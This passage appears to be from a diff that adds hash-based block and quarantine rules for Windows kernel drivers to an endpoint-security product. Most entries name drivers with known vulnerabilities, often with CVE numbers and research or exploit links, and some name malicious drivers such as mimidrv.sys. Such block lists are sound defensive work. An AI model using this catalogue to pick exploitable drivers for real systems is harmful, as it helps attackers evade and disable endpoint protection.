VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6c35a0c6-43f3-5b4d-b34d-c7cc820afcc6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825836Z", + "creation_date": "2026-03-23T11:45:31.825838Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825844Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "540c2a28f82a9f3b09b79c6d0adbccff9655645fcc93133840ac4abcb19ef643", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6c36919e-06a7-5eb1-99aa-81dfba1a696d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974540Z", + 
"creation_date": "2026-03-23T11:45:29.974542Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974547Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "14cfe7b4f7572aa3434ac5dd458a35f286538b34734cf7a310fb7bcba209921c", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6c3db75b-5858-5815-ab91-6b1536bd4212", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145242Z", + "creation_date": "2026-03-23T11:45:32.145244Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145249Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e060b051d0b8eca8490347f679e63391c792b6b37684e11301f4ed187173c3fd", + "comment": "Vulnerable Kernel Driver (aka RtsPer.sys) [https://www.loldrivers.io/drivers/32155681-33e8-4d0d-b9f6-c822851e7321/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"6c538976-3446-58d6-9aad-45374163ef6d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607748Z", + "creation_date": "2026-03-23T11:45:29.607750Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607755Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9f1025601d17945c3a47026814bdec353ee363966e62dba7fe2673da5ce50def", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6c5a0c32-08da-54bf-a778-a2f3b476e2ea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819567Z", + "creation_date": "2026-03-23T11:45:30.819569Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.819575Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "16ae28284c09839900b99c0bdf6ce4ffcd7fe666cfd5cfb0d54a3ad9bea9aa9c", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6c63e9e1-8c23-5cee-8edb-04143c794a1a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143521Z", + "creation_date": "2026-03-23T11:45:32.143524Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143529Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3af9c376d43321e813057ecd0403e71cafc3302139e2409ab41e254386c33ecb", + "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6c746b78-8969-5498-af20-41eb156a995d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825364Z", + "creation_date": "2026-03-23T11:45:31.825367Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825376Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "06480527d19a9f4976aeb5c1a6bd362618d472d2bc84032e50ff4f23187ff5dd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6c76c165-dd18-5f38-b09e-10c4aaddebff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467210Z", + "creation_date": "2026-03-23T11:45:30.467213Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467222Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"0cde416accd63c33ac9f4fd7bb6426c8bc3e6a18a335e9bbfea7cc767c30d3b6", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6c81e492-3627-5c81-85b5-d9ef245db970", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146226Z", + "creation_date": "2026-03-23T11:45:32.146229Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146234Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b4f33ffef069c18e8a8834eb448dd1f1dbdaae93b140cfff5a1db015eb3ada2f", + "comment": "Malicious Kernel Driver (aka driver_b4f33ffe.sys) [https://www.loldrivers.io/drivers/51a44484-8bcc-4150-8b94-4a755cff0af8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6c8880c7-69de-5f01-9a22-73e3bdb020d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:30.467819Z", + "creation_date": "2026-03-23T11:45:30.467823Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467832Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1f43d0680cecea2db04d2f2eff7ff37a13beec280e62b76b9dbdc38d0e225fca", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6c8cab98-f1c2-5b65-aae6-b7318f2aa8d8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617289Z", + "creation_date": "2026-03-23T11:45:29.617291Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617296Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ad40e6d0f77c0e579fb87c5106bf6de3d1a9f30ee2fbf8c9c011f377fa05f173", + "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"6c8dd904-0551-5481-bad6-efb1f4b12ec6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817042Z", + "creation_date": "2026-03-23T11:45:31.817044Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817050Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "268e8ab3593266b68e6ffde8b97ad4fe04eff0b10d737d4e9bccd6623d43f374", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6c92435a-63c7-529c-864f-dbf529ecbbc4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969488Z", + "creation_date": "2026-03-23T11:45:29.969490Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.969495Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5af59d6ca109b5cae3350b48b85274ce181e45be4c7f7156bdf58ca3ca7f4188", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6c92e144-b19e-5239-bd5d-95889bed4a68", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825494Z", + "creation_date": "2026-03-23T11:45:31.825496Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825501Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f46c650e76a8e764cd4b4867c8baf9bbdbaae3be5c7b5d193ab3813fb59e0a57", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6c9cfd80-5407-5d71-aaa1-8ff7b6e29b9f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614215Z", + "creation_date": "2026-03-23T11:45:29.614217Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614222Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "555ebe7901706dbf801b5dbda6660002d3b36e5c669ec98ccfc6884a7481c56e", + "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6ca053e4-4c46-53d0-8f9a-ca1130043e55", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606935Z", + "creation_date": "2026-03-23T11:45:29.606937Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606950Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"b4f9272894f926d4f3b957fca673140a3a24dc896f1a49badaa1e04687b223cd", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6ca0ee17-6652-5a70-87b5-17024ccd354c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979602Z", + "creation_date": "2026-03-23T11:45:29.979604Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979609Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e7e7824d611527b67fc36128da1b35d9b8ce3ffdab3fb96e3dbabd6e9c9570c0", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6ca924f3-1fa3-5ba0-a28d-e53b85d9ab62", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463839Z", + "creation_date": "2026-03-23T11:45:30.463842Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463851Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bcca03ce1dd040e67eb71a7be0b75576316f0b6587b2058786fda8b6f0a5adfd", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6ca99354-fa3d-5e23-bce0-af4be1bd3496", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473242Z", + "creation_date": "2026-03-23T11:45:30.473245Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473254Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "da617fe914a5f86dc9d657ef891bbbceb393c8a6fea2313c84923f3630255cdb", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"6ca9b741-f1d4-5f9a-9bf7-4bb13f059716", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473236Z", + "creation_date": "2026-03-23T11:45:31.473239Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473248Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9137c32623cd450511f60c6bb44e14ced32dc66de2bd5880ce9be18c40bee263", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6cb03078-0f43-50cb-af8e-35dee76744dd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487908Z", + "creation_date": "2026-03-23T11:45:31.487910Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.487916Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2b49574345aac6924339f555e06ad0cb4ba8c36dca6403a6d9388174dcf76efd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6cb540bb-f386-56a4-a700-6c0292258494", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618925Z", + "creation_date": "2026-03-23T11:45:29.618927Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618932Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "989e3234c1b61ea2db590cb170f79e25e9c9a6262b7b9a751ecfc6bf4468b8c4", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6cbb6b5c-18ca-52ad-ad7c-61f99d1dfd36", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159264Z", + "creation_date": "2026-03-23T11:45:31.159266Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159272Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f1435428af7ccb2ae2fbe1e581f4ad7c38bfaa5367e9bbe29f9732f838a84500", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6cc7ec1e-58cd-57d3-9105-e395944ef424", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452461Z", + "creation_date": "2026-03-23T11:45:30.452465Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452474Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "23be3616a4fb4e620f971e4348dc46b7980abca6463be3cb4b83769a955f2810", + "comment": "Vulnerable Kernel Driver (aka Chaos-Rootkit.sys) [https://www.loldrivers.io/drivers/abcd2c10-1078-4cf9-b320-04ca38d22f98/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6cddd27c-2273-5e09-b052-dfeb5279592d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819673Z", + "creation_date": 